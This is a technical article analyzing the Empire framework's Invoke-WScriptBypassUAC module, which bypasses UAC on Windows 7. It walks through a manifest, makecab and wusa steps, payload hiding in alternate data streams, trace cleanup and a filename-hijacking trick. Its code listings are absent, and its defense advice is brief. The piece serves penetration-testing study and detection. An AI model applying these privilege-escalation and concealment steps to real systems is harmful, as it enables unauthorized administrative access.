Analysis of Invoke-WScriptBypassUAC Exploitation in Empire

0x00 Preface

---

The well-known post-exploitation framework Empire serves as an excellent learning template, and the post-exploitation techniques it contains are worthy of in-depth study.

This article will select a classic UAC bypass method in Empire, Invoke-WScriptBypassUAC, for analysis, introducing its bypass principles and more exploitation techniques in penetration testing. Understanding how to exploit is key to knowing how to defend.

Invoke-WScriptBypassUAC address:

https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-WScriptBypassUAC.ps1

0x01 Introduction

---

This article will cover the following:

• Invoke-WScriptBypassUAC bypass principles
• Exploitation extensions
• Defense and detection

0x02 Invoke-WScriptBypassUAC Bypass Principles

---

Invoke-WScriptBypassUAC is implemented via PowerShell, conceptually drawing inspiration from the GitHub shared by Vozzie, with the address as follows:

https://github.com/Vozzie/uacscript

Vozzie mentioned that ZDI and Microsoft chose to ignore this UAC bypass 'vulnerability'; ZDI considers it not a remote vulnerability, and Microsoft views UAC bypass as not falling within the scope of vulnerabilities.

Invoke-WScriptBypassUAC employs some practical minor techniques in its implementation, so this article primarily analyzes the bypass method of Invoke-WScriptBypassUAC.

This method is only applicable to Win7 and does not apply to Win8 or Win10 (reasons explained later).

Test system: Win7 x86

Since the source code in PowerShell format is publicly available, the key operational flow of the script is directly introduced:

1. Check if the operating system is Win7 and if the permissions are standard.
2. Release the file wscript.exe.manifest in the Temp directory.
3. Use makecab.exe to compress wscript.exe.manifest and wscript.exe.
4. Use wusa to extract the compressed package, releasing wscript.exe.manifest and wscript.exe to the c:\Windows directory.
5. The payload is stored in the ADS of the Appdata folder.
6. Use c:\Windows\wscript.exe to execute the payload, achieving admin privilege execution of the payload and bypassing UAC.

0x03 Exploitation Extension

---

Once you master the operational process, we can manually conduct split testing, during which more exploitation ideas can be discovered.

1. Save the wscript.exe.manifest file

The code is as follows:

2. Use makecab to create CAB files

cmd:

3. Use wusa to extract CAB files and deploy to c:\windows

cmd:

Note:

The key to the success of this method lies in using wusa to extract the cab file to c:\windows. Typically, releasing files to the c:\windows directory requires administrator privileges, but with wusa, ordinary user privileges suffice. Of course, other directories with administrator privileges can also be used, such as: C:\Windows\addins

4. Use this wscript.exe to execute vbs or js scripts

cmd:

Note:

Here, js and vbs scripts require absolute paths. Although it is a cmd with ordinary user privileges, because wscript.exe.manifest in the same directory as wscript.exe specifies to start with administrator privileges, the executed vbs or js scripts run with administrator privileges, thereby achieving UAC bypass.

The vbs script corresponding to executing cmd commands is as follows:

The corresponding JavaScript script is as follows:

5. Clear cache files after bypass

Delete wscript.exe and wscript.exe.manifest under c:\windows\

The corresponding VBS script is as follows:

The corresponding JavaScript script is as follows:

Note:

Deleting wscript.exe and wscript.exe.manifest under c:\windows\ requires administrator privileges

Delete cache files:

6. Supplement

(1) There are many paths available for exploitation; to view folder properties, use the following PowerShell command:

(2) There are many paths to save vbs or js scripts, such as special ADS:

• ...files
• Special COM files
• Disk root directory

For more details, refer to the article 'Advanced Exploitation Techniques of Hidden Alternative Data Streams'

Of course, the ADS location used by Invoke-WScriptBypassUAC is also very hidden

$env:USERPROFILE\AppData is a system hidden file by default

Therefore, using dir /r cannot see the folder $env:USERPROFILE\AppData, and naturally cannot see the added ADS

To see it, you need to use dir /a:h /r (/a:h specifies viewing system hidden files), or view all files: dir /a /r

(3) Reason for Win8 failure

Using makecab and wusa can extract cab files to high-privilege directories, such as c:\windows

However, the method of achieving high-privilege execution using wscript.exe and wscript.exe.manifest fails, as Win8 uses embedded manifests

(4) Reason for Win10 failure

Win10 systems cannot use makecab and wusa to extract cab files to high-privilege directories, such as c:\windows

Of course, embedded manifests are also used

0x04 Further exploitation of wusa feature

---

wusa feature:

Under normal user permissions, files can be released to administrator-privileged folders

Applicable to Win7, Win8

Exploitation one: Filename hijacking

1. Rename calc.exe to regedit.com

2. Release the file regedit.com in c:\windows

cmd：

3、Hijacking

Entering regedit in cmd will execute regedit.com instead of regedit.exe

For details on this exploitation method, refer to the article: 《A dirty way of tricking users to bypass UAC》

Other exploitation methods (omitted for now)

0x05 Defense

---

This UAC bypass method only applies to Win7, and no corresponding patch has been seen yet. Antivirus software can intercept this script, but there are also bypass methods.

From a defender's perspective, it is recommended to monitor the invocation of wusa.exe.

0x06 Summary

---

This article analyzes Invoke-WScriptBypassUAC. Although Microsoft does not recognize this vulnerability, both penetration testers and defenders should pay attention to it during the post-exploitation phase.